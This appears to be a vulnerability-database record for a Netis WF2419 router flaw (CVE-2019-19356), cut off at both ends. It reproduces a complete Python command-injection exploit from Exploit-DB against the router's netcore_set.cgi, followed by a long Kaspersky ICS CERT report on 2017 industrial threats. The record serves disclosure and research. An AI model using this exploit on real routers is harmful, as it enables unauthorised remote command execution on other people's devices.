\"__main__\":\n ap = argparse.ArgumentParser(\n description=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\")\n ap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\")\n ap.add_argument(\"cmd\", help=\"Command to run.\")\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\",\n default=\"admin\")\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\",\n default=\"admin\")\n args = ap.parse_args()\n main()", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:35", "description": "", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-02T00:00:00", "type": "exploitdb", "title": "Netis WF2419 2.2.36123 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1337", "CVE-2019-19356"], "modified": "2020-03-02T00:00:00", "id": "EDB-ID:48149", "href": "https://www.exploit-db.com/exploits/48149", "sourceData": "# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \r\n# Exploit Author: Elias Issa\r\n# Vendor Homepage: http://www.netis-systems.com\r\n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75\r\n# Date: 2020-02-11\r\n# Version: WF2419 V2.2.36123 => V2.2.36123\r\n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123\r\n# CVE : CVE-2019-19356\r\n\r\n\r\n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\"\r\n\r\n#!/usr/bin/env python\r\nimport argparse\r\nimport requests\r\nimport json\r\n\r\ndef exploit(host,cmd):\r\n\t# Send Payload\r\n\theaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \r\n\t\t\t'Content-Type': 'application/x-www-form-urlencoded'}\r\n\tpost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\"\r\n\tvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\"\r\n\treq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)\r\n\tprint('[+] Payload sent')\r\n\ttry :\r\n\t\tjson_data = json.loads(req_payload.text)\r\n\t\tif json_data[0] == \"SUCCESS\":\r\n\t\t\tprint('[+] Exploit Sucess')\r\n\t\t\t# Get Command Result\r\n\t\t\tprint('[+] Getting Command Output\\n')\r\n\t\t\tresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\"\r\n\t\t\tpost_data = \"mode_name=netcore_get&no=no\" \r\n\t\t\treq_result = requests.post(result_page, data=post_data, headers=headers_value)\r\n\t\t\tjson_data = json.loads(req_result.text)\r\n\t\t\tresults = json_data[\"tools_results\"]\r\n\t\t\tprint results.replace(';', '\\n')\r\n\t\telse:\r\n\t\t\tprint('[-] Exploit Failed')\r\n\texcept:\r\n \t\tprint(\"[!] You might need to login.\") \r\n\r\n# To be implemented\r\ndef login(user, password):\r\n\tprint('To be implemented')\r\n\r\ndef main():\r\n host = args.host\r\n cmd = args.cmd\r\n user = args.user\r\n password = args.password\r\n #login(user,password)\r\n exploit(host,cmd)\r\n\r\nif __name__ == \"__main__\":\r\n ap = argparse.ArgumentParser(\r\n description=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\")\r\n ap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\")\r\n ap.add_argument(\"cmd\", help=\"Command to run.\")\r\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\",\r\n default=\"admin\")\r\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\",\r\n default=\"admin\")\r\n args = ap.parse_args()\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48149", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2018-03-30T15:53:03", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/03/07180518/ics_cert_report_main-990x400.jpg)\n\n_For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems \u2013 those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (_[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the second half of 2017. _\n\n_The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security._\n\n## Overview of ICS vulnerabilities identified in 2017\n\n_The analysis of vulnerabilities was performed based on vendor advisories, publicly available information from open vulnerability databases (ICS-CERT, CVE, Siemens Product CERT), as well as the results of Kaspersky Lab ICS CERT's own research. Vulnerability data published on the _[_ICS-CERT_](<https://ics-cert.us-cert.gov/>)_ website in 2017 was used to create statistical diagrams._\n\n### Vulnerabilities in various ICS components\n\n#### Number of vulnerabilities identified\n\nIn 2017, the total number of vulnerabilities identified in different ICS components and published on the [ICS-CERT](<https://ics-cert.us-cert.gov/>) website was 322. This includes vulnerabilities identified in general-purpose software and in network protocols that are also relevant to industrial software and equipment. These vulnerabilities are discussed in this report separately.\n\n#### Analysis by Industry\n\nThe largest number of vulnerabilities affect industrial control systems in the energy sector (178), manufacturing processes at various enterprises (164), water supply (97) and transportation (74).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130415/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130415/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-1.png>)\n\n_Number of vulnerable products used in different industries \n(according to [ICS-CERT](<https://ics-cert.us-cert.gov/>) classification) \nvulnerabilities published in 2017_\n\n#### Severity levels of the vulnerabilities identified\n\nMore than half (194) of the vulnerabilities identified in ICS systems were assigned [CVSS v.3.0](<https://www.first.org/cvss>) base scores of 7 or higher, corresponding to a high or critical level of risk.\n\n_Table 1 \u2013 Distribution of published vulnerabilities by risk level_\n\n| **Severity score** \n---|--- \n9 to 10 (critical) | 7 to 8.9 (high) | 4 to 6.9 (medium) | 0 to 3.9 (low) \n**Number of vulnerabilities** | 60 | 134 | 127 | 1 \n \nThe highest severity score of 10 was assigned to vulnerabilities identified in the following products:\n\n * [iniNet Solutions GmbH SCADA Webserver](<https://ics-cert.us-cert.gov/advisories/ICSA-17-264-04>),\n * [Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455](<https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01>),\n * [Hikvision Cameras](<https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01>),\n * [Sierra Wireless AirLink Raven XE and XT](<https://ics-cert.us-cert.gov/advisories/ICSA-17-115-02>),\n * [Schneider Electric Modicon M221 PLCs and SoMachine Basic](<https://ics-cert.us-cert.gov/advisories/ICSA-17-103-02A>),\n * [BINOM3 Electric Power Quality Meter](<https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01A>),\n * [Carlo Gavazzi VMU-C EM and VMU-C PV](<https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03>).\n\nAll vulnerabilities that were assigned the severity rating of 10 have much in common: they have to do with authentication issues, can be exploited remotely and are easy to exploit.\n\nIn addition, the highest severity rating was assigned to a vulnerability in the [Modicon Modbus Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>), which is discussed below.\n\nIt should be noted that the CVSS base score does not account for the aspects of security that are specific to industrial automation systems or for the distinctive characteristics of each organization's industrial processes. This is why, when assessing the severity of a vulnerability, we recommend keeping in mind, in addition to the CVSS score, the possible consequences of its exploitation, such as the non-availability or limited availability of ICS functionality that affects the continuity of the industrial process.\n\n#### Types of vulnerabilities identified\n\nThe most common types of vulnerabilities include buffer overflow (Stack-Based Buffer Overflow, Heap-Based Buffer Overflow) and improper authentication (Improper Authentication).\n\nAt the same time, 23% of all vulnerabilities identified are web-related (Injection, Path Traversal, Cross-Site Request Forgery (CSRF), Cross-Site Scripting) and 21% are associated with authentication issues (Improper Authentication, Authentication Bypass, Missing Authentication for Critical Function) and with access control problems (Access Control, Incorrect Default Permissions, Improper Privilege Management, Credentials Management).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130422/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130422/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-2.png>)\n\n_Most common vulnerability types_\n\nExploitation of vulnerabilities in various ICS components by attackers can lead to arbitrary code execution, unauthorized control of industrial equipment and that equipment's denial of service (DoS). Importantly, most vulnerabilities (265) can be exploited remotely without authentication and exploiting them does not require the attacker to have any specialized knowledge or superior skills.\n\nExploits have been published for 17 vulnerabilities, increasing the risk of their exploitation for malicious purposes.\n\n#### Vulnerable ICS components\n\nThe largest number of vulnerabilities were identified in:\n\n * SCADA/HMI components (88)**, **\n * networking devices designed for industrial environments (66),\n * PLCs (52),\n * and engineering software (52).\n\nVulnerable components also include protection relays, emergency shutdown systems, environmental monitoring systems and industrial video surveillance systems.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130429/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-3.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130429/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-3.png>)\n\n_Distribution of vulnerabilities identified by ICS components_\n\n### Vulnerabilities in industrial protocols\n\nAn important part of ICS software security research in 2017 was identifying serious vulnerabilities in implementations of industrial protocols. Specifically, vulnerabilities were identified in the [implementation of the Modbus Protocol in Modicon series controllers](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>) (that vulnerability was assigned a CVSS v. 3 base score of 10), as well as in [implementations of the OPC UA protocol stack](<https://ics-cert.us-cert.gov/advisories/ICSA-17-243-01B>) and in an implementation of the [PROFINET Discovery and Configuration Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-129-01H>). The security issues identified affect entire product families.\n\n### Impact of vulnerabilities in 'traditional' technologies on industrial systems\n\nIn addition to ICS-specific vulnerabilities, a number of serious flaws were identified in H2 2017 in software platforms and network protocols that can be exploited to attack industrial systems.\n\nThe vulnerabilities in the WPA2 protocol unexpectedly turned out to be relevant to industrial solutions. They were found to [affect](<https://ics-cert.kaspersky.com/news/2017/11/15/ics-krack/>) equipment from several vendors, including Cisco, Rockwell Automation, Sierra Wireless, ABB and Siemens. Industrial control systems were also affected by multiple vulnerabilities in [the Dnsmasq DNS server](<https://ics-cert.kaspersky.com/news/2017/12/05/dnsmasq/>), [Java Runtime Environment](<https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02>), [Oracle Java SE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-262-01>), and [Cisco IOS and IOS XE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-094-04>).\n\nVulnerabilities in Intel products can also affect the security of industrial equipment. In the second half of 2017, [information on several vulnerabilities in Intel products](<https://ics-cert.kaspersky.com/news/2017/11/24/intel-updates/>) (ME, SPS and TXE) was published. These vulnerabilities affect mainly SCADA server hardware and industrial computers that use vulnerable CPUs. These include, for example, Automation PC 910 by B&R, Nuvo-5000 by Neousys and the GE Automation RXi2-XP product line. As a rule, vendors do not consider it necessary to release public advisories on vulnerabilities of this type (derived from using third-party technologies). Of course, there are some positive exceptions. For example, Siemens AG has released [an advisory](<https://ics-cert.kaspersky.com/news/2018/03/01/siemens-intel/>) stating that these vulnerabilities affect a range of the company's products. Earlier, the company published [information](<https://cert-portal.siemens.com/productcert/pdf/ssa-874235.pdf>) about similar vulnerabilities in Intel technologies affecting its products.\n\n### IoT device vulnerabilities\n\n2017 was marked by a growing number of vulnerabilities being identified in internet of things (IoT) devices. As a consequence, such vulnerabilities were increasingly often exploited to create botnets. The activity of three new botnets was uncovered in the last two months of 2017 only. These included the [Reaper botnet](<https://ics-cert.kaspersky.com/news/2017/11/09/reaper/>) and new Mirai variants, including the [Satori botnet](<https://ics-cert.kaspersky.com/news/2017/12/14/satori/>).\n\nMultiple vulnerabilities were identified in [Dlink 850L routers](<https://blogs.securiteam.com/index.php/archives/3364>), [WIFICAM wireless IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>), [Vacron network video recorders](<https://blogs.securiteam.com/index.php/archives/3445>) and other devices.\n\nOn top of the new IoT device flaws, some old vulnerabilities are still not closed, such as [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) in Realtek devices and the vulnerability dating back to 2012 that can be exploited to get the configuration of [Serial-to-Ethernet converters](<https://www.bleepingcomputer.com/news/security/thousands-of-serial-to-ethernet-devices-leak-telnet-passwords/>), including the Telnet password, by sending a request on port 30718. The vulnerability in Serial-to-Ethernet converters directly affects the industrial internet of things (IIoT), since many systems that enable the operators of industrial equipment to remotely control its status, modify its settings and control its operation are based on serial interface converters.\n\nThe security of IoT devices is also affected by issues relating to the security of traditional information technology. Specifically, vulnerabilities in implementations of the Bluetooth protocol led to the emergence of the new attack vector, [BlueBorne](<https://ics-cert.kaspersky.com/news/2017/09/15/blueborne/>), which poses a threat to mobile, desktop and IoT operating systems.\n\n## Vulnerabilities identified by Kaspersky Lab ICS CERT\n\nIn 2017, Kaspersky Lab ICS CERT experts not only analyzed the security issues associated with different vendors' ICS components, but also focused on the common ICS components, platforms and technologies used in different vendors' solutions. This type of research is important because vulnerabilities in such components significantly increase the number of potential attack victims. Research in this area continues in 2018.\n\n### Number of vulnerabilities identified\n\nBased on its research, Kaspersky Lab ICS CERT identified 63 vulnerabilities in industrial and IIoT/IoT systems in 2017.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130435/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130435/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-4.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby types of components analyzed_\n\nEvery time we identified a vulnerability, we promptly notified the respective product's vendor.\n\n### Number of CVE entries published\n\nDuring 2017, 11 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT. It should be noted that some of these CVE entries were published after vendors closed vulnerabilities information on which had been provided to them in 2016.\n\nInformation on other vulnerabilities identified by Kaspersky Lab ICS CERT experts will be published after these vulnerabilities are closed by the respective vendors.\n\n### Capabilities provided by the vulnerabilities identified\n\nThe largest number of vulnerabilities identified (29) could allow an attacker to cause denial of service (DoS) remotely. 8% of the vulnerabilities identified could allow an attacker to execute arbitrary code remotely on the target system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130442/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130442/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-5.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby capabilities provided_\n\n### Vulnerabilities in ICS components\n\nIn 2017, Kaspersky Lab ICS CERT experts identified 30 vulnerabilities in ICS products from different vendors. These are mainly large automation system vendors, such as Schneider Electric, Siemens, Rockwell Automation, Emerson, and others.\n\n#### Severity ratings of the vulnerabilities identified\n\nTo assess the severity of vulnerabilities identified in ICS components, Kaspersky Lab ICS CERT used its own vulnerability rating system based on the metrics defined in [CVSS v3.0](<https://www.first.org/cvss/v2/faq>) (Common Vulnerability Scoring System) standard, with the following vulnerability severity levels identified:\n\n * least severe: CVSS v3.0 base score of 5.0 or less,\n * medium severity: CVSS v3.0 base score of 5.1 to 6.9 (inclusive),\n * most severe: CVSS v3.0 base score of 7.0 or more.\n\nThe absolute majority of vulnerabilities identified are in the most severe group. These include the [XXE vulnerability in industrial solutions](<https://ics-cert.kaspersky.com/news/2017/09/07/closing-an-xxe-vulnerability-in-siemens-industrial-solutions/>) that use the Discovery Service of the OPC UA protocol stack.\n\n#### Vulnerabilities in OPC UA implementations\n\nOne of the research areas involved searching for vulnerabilities in different implementations of the OPC UA technology. This type of research is needed to improve the overall security level of products from different vendors that use the technology in their solutions. Vulnerabilities in such technologies are a Swiss army knife of sorts for attackers, enabling them to hack industrial systems from different vendors.\n\nA total of 17 critical denial-of-service vulnerabilities were identified during the period.\n\nSome of the vulnerabilities were identified in sample software implementations of various OPC UA functions available in the official Github repository. In the process of communicating to several vendors of industrial automation systems, we found out that many of them had used code from such samples in their product code. This means that the vulnerabilities identified may affect complete product lines from different vendors.\n\n### Vulnerabilities in third-party hardware-based and software solutions\n\nKaspersky Lab ICS CERT experts have also analyzed third-party hardware-based solutions that are widely used in industrial automation systems.\n\nSpecifically, experts analyzed the SafeNet Sentinel hardware-based solution by Gemalto. As a result of the research, [15 vulnerabilities](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>) were identified in the software part of the solution (11 in December 2016 and 4 in 2017). These flaws affect a large number of products that use the vulnerable software, including solutions by ABB, General Electric, HP, Cadac Group, Zemax and other software developers, the number of which may reach 40 thousand, according to some estimates.\n\n### Vulnerabilities in internet of things (IoT and IIoT) components\n\nAnother area of research was the assessment of the information security status of internet of things (IoT), components, including industrial internet of things (IIoT) components.\n\nKaspersky Lab experts are working with vendors to improve the security of their solutions with respect to 11 vulnerabilities identified. Vulnerabilities were found in the following components and solutions:\n\n * smart cameras,\n * hardware-based IIoT solutions.\n\nIt should be noted that vulnerabilities in implementations of OPC UA standards, which are discussed above, also directly affect IIoT security.\n\n### Vulnerabilities in industrial routers\n\nIn the past year, 18 vulnerabilities were identified in industrial networking equipment from different vendors. Typical vulnerabilities: information disclosure, privilege escalation, arbitrary code execution, denial of service.\n\n### Working with software vendors\n\nWith respect to information on the vulnerabilities identified, Kaspersky Lab follows the principle of responsible information disclosure, promptly reporting vulnerabilities to the respective software vendors.\n\nIn 2017, Kaspersky Lab ICS CERT researchers actively collaborated with various companies to ensure that the vulnerabilities identified would be closed.\n\nOf the 63 vulnerabilities identified by Kaspersky Lab ICS CERT in 2017, vendors closed 26. Vulnerabilities were closed by Siemens, General Electric, Rockwell Automation, Gemalto and the [OPC Foundation](<https://en.wikipedia.org/wiki/OPC_Foundation>) industrial consortium.\n\nIt should be noted that most vendors of software for industrial automation systems that we have worked with have lately been devoting much more care and resources to the task of closing the vulnerabilities identified and fixing information security issues in their products, including their earlier versions.\n\nAt the same time, the issue of closing vulnerabilities in industrial automation systems remains relevant. In many cases, it takes large vendors a long time to close vulnerabilities in their products. Sometimes software vendors decide to patch only new versions of a vulnerable product, which they are planning to release in the future.\n\nIn addition, some vendors still need to improve the organizational and technical aspects of the procedures they use to inform customers about the vulnerabilities patched. Even after an update has been released, many users are unaware of the relevant security issue and use vulnerable versions of the product. This is particularly important for embedded software, as well as the technologies and specific program modules used by numerous third-party vendors (one example can be found [here](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>)).\n\nPositive examples include Siemens and the OPC Foundation, which have quickly closed the vulnerabilities identified and released public advisories on existing vulnerabilities.\n\n## Malware in industrial automation systems\n\nAs we have [mentioned before](<https://ics-cert.kaspersky.com/reports/2017/03/28/threat-landscape-for-industrial-automation-systems-in-the-second-half-of-2016/#3l3>), many industrial companies use modern networking technologies that improve the transparency and efficiency of enterprise management processes, as well as providing flexibility and fault tolerance for all tiers of industrial automation. As a result, industrial networks are increasingly similar to corporate networks \u2013 both in terms of use case scenarios and in terms of the technologies used. The unfortunate flip side of this is that internet threats, as well as other traditional IT threats, increasingly affect the industrial networks of modern organizations.\n\nIn the second half of 2017, Kaspersky Lab security solutions installed on industrial automation systems detected over 17.9 thousand different malware modifications from about 2.4 thousand different malware families.\n\n### Accidental infections\n\nIn the vast majority of cases, attempts to infect ICS computers are accidental and are not part of targeted attacks. Consequently, the functionality implemented in malware is not specific to attacks on industrial automation systems. However, even without ICS-specific functionality, a malware infection can have dire consequences for an industrial automation system, including an emergency shutdown of the industrial process. This was demonstrated by the WannaCry outbreak in May 2017, when several enterprises in different industries had to suspend their industrial processes after being infected with the encryption malware. We wrote about encryption malware-related threats in our [previous report](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/>) and several articles (see [here](<https://ics-cert.kaspersky.com/reports/2017/06/22/wannacry-on-industrial-networks/>) and [here](<https://ics-cert.kaspersky.com/alerts/2017/06/29/more-than-50-percent-of-organizations-attacked-by-expetr-petya-cryptolocker-are-industrial-companies/>)).\n\n#### Unexpected consequences of the WannaCry outrbreak\n\nIt is important to note that some IT threats can do much more significant harm in an industrial network than in an office network. To demonstrate this, we look at two incidents investigated by the Kaspersky Lab ICS-CERT team.\n\nIn H2 2017, we were approached by several industrial enterprises at once, where mass infections of industrial networks with WannaCry encryption malware had been detected. It was later determined that the initial infections of office networks at the victim companies had in all the cases taken place back in the first half of 2017, at the height of the WannaCry outbreak. However, the infections were not noticed until the malware propagated to the enterprises' industrial networks. As it turned out during investigation, encryption functionality in the malware samples was damaged and the infected systems on corporate networks continued to operate normally, without any failures. However, the infection of industrial networks in these cases had unexpected negative consequences.\n\nAt one of the enterprises infected by WannaCry, the workstations used by operators started to bring up the Blue Screen of Death all the time, leading to emergency reboots. The reason for this unexpected consequence of infection was that the machines ran Windows XP. It is a well-known fact that the DoublePulsar exploit used by WannaCry to propagate causes WindowsXP to crash, resulting in a Blue Screen of Death and a reboot. In cases when numerous machines in the industrial segment of an organization's network are infected, WindowsXP machines are often attacked and go into emergency reboots. As a result, operators are rendered incapable of monitoring and controlling the industrial process. This makes WannaCry a denial-of-service attack tool of sorts.\n\nIn another incident, the propagation of WannaCry caused some of the devices on an enterprise's industrial network to become temporarily unavailable during periods when the network activity of the malware coincided with certain stages in the industrial process. This resulted in emergency interruptions of an industrial process that was critical for the enterprise for an average of 15 minutes.\n\n#### Cryptocurrency miners in industrial network infrastructure\n\nAccording to Kaspersky Lab ICS CERT data, cryptocurrency mining programs attacked 3.3% of industrial automation system computers during the period from February 2017 to January 2018.\n\nUp to August 2017, the percentage of ICS computers attacked by cryptocurrency miners did not exceed 1%. This figure grew in September and did not go back to less than 1% for the rest of 2017. In October, cryptocurrency miner attacks against ICS computers peaked, with 2.07% of ICS computers being attacked.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130449/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130449/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-6.png>)\n\n_Percentage of ICS computers attacked by cryptocurrency mining malware_\n\nLike other malware infecting systems at industrial enterprises, cryptocurrency miners can pose a threat to industrial process monitoring and control. In the process of its operation, malware of this type creates a significant load on the computer's computational resources. An increased load on processors can negatively affect the operation of the enterprise's ICS components and threaten their stability.\n\nAccording to our assessments, in most cases cryptocurrency miners infect ICS computers accidentally. There is no reliable information on machines that are part of the industrial network infrastructure being infected as a result of targeted attacks the goal of which is to mine cryptocurrencies, with the exception of cases when miners are installed by unscrupulous employees of victim enterprises. The cryptocurrency mining malware typically enters the industrial network infrastructure from the internet or, less commonly, from removable media or network shares.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130456/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130456/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-7.png>)\n\n_Sources of ICS computer infections with cryptocurrency miners_ \nPercentage of systems attacked, February 2017 \u2013 January 2018_\n\nCryptocurrency miners have infected numerous websites, including those of industrial companies. In such cases, cryptocurrencies are mined on the systems of users who visit infected web resources. This technique is called cryptojacking.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130503/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130503/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-8.png>)\n\n__Screenshot showing a fragment of code found on a web resource infected with mining malware __\n\n#### Botnet agents in the industrial network infrastructure\n\nIn most cases, the functionality of botnet agents includes searching for and stealing financial information, stealing authentication data, brute forcing passwords, sending spam, as well as conducting attacks on specified remote internet resources, including denial-of-service (DDoS) attacks. In addition, in cases where a botnet agent attacks third-party resources (such cases have been detected), the companies that own the IP addresses from which the attacks are launched may face certain reputational risks.\n\nAlthough the destructive activity of botnet agents is not specifically designed to disrupt the operation of any industrial system, an infection with this type of malware may pose a significant threat to a facility that is part of the industrial infrastructure. Malware of this type can cause network failures, denial of service (DoS) of the infected system and other devices on the network. It is also common for malware to contain errors in its code and/or be incompatible with software used to control the industrial infrastructure, potentially resulting in the disruption of industrial process monitoring and control.\n\nAnother danger associated with botnet agents is that malware of this type often includes data collection functionality and, like backdoor malware, enables the attackers to control the infected machine surreptitiously. System data collected by bots by default is sufficient for accurately identifying the company that owns the system and the type of the infected system. What's more, access to machines infected with botnet agents is often put up for sale at specialized exchanges on the Darknet. Consequently, threat actors interested in infected industrial control systems can gain access to a victim company's sensitive data and/or systems used to control the industrial infrastructure.\n\nIn 2017, 10.8% of all ICS systems were attacked by botnet agents. Moreover, botnet agent attack statistics show that 2% of ICS systems were attacked by several malicious programs of this type at once.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130511/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130511/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-9.png>)\n\n_Percentage of ICS computers attacked by botnet agents in 2017_\n\nThe main sources of botnet agent attacks on ICS systems in 2017 were the internet, removable media and email messages.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130518/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130518/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-10.png>)\n\n_Sources of ICS infection with botnet agents, percentage of ICS computers attacked, 2017_\n\nThis once again demonstrates the need for access control to ensure that information is exchanged securely between an enterprise's industrial network and other networks, as well as the need to block unauthorized removable media from connecting to ICS systems and to install tools designed to detect and filter malicious objects from email messages.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130524/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130524/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-11.png>)\n\n_Top 5 botnet agent most commonly found on ICS systems in 2017, \npercentage of ICS computers attacked_\n\nNearly two percent of all systems analyzed were attacked with Virus.Win32.Sality malware. In addition to infecting other executable files, this malware includes the functionality of resisting antivirus solutions and downloading additional malicious modules from the command-and-control server. The most widespread Sality modules are components for sending spam, stealing authentication data stored on the system and downloading and installing other malware.\n\nThe Dinihou botnet agent, which attacked 0.9% of ICS systems analyzed, is in second position. The malware includes functionality that enables the attackers to upload an arbitrary file from an infected system, creating the threat of sensitive data leaks for victim organizations. In addition, both Worm.VBS.Dinihou and Virus.Win32.Nimnul, which is in third place with 0.88%, can be used to download and install other malware on infected systems.\n\nMost modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\nThe fifth position is taken up by Backdoor.Win32.Androm, which ranked highest based on the number of attacks on ICS systems in H2 2016. The malware provides the attackers with a variety of information on the infected system and enables them to download and install modules for performing destructive activities, such as stealing sensitive data.\n\n### Targeted attacks\n\n2017 saw the publication of information on two targeted attacks on systems that are part of the industrial infrastructure \u2013 [Industroyer](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/#21>) and [Trisis/Triton](<https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>). In these attacks, for the first time since Stuxnet, threat actors created their own implementations of industrial network protocols, gaining the ability to communicate with devices directly.\n\n#### Trisis/Triton\n\nIn December 2017, researchers reported discovering previously unknown malware that targeted critical infrastructure systems. The discovery was made as a result of investigating an incident at an unnamed industrial enterprise. The malicious program was dubbed Triton or 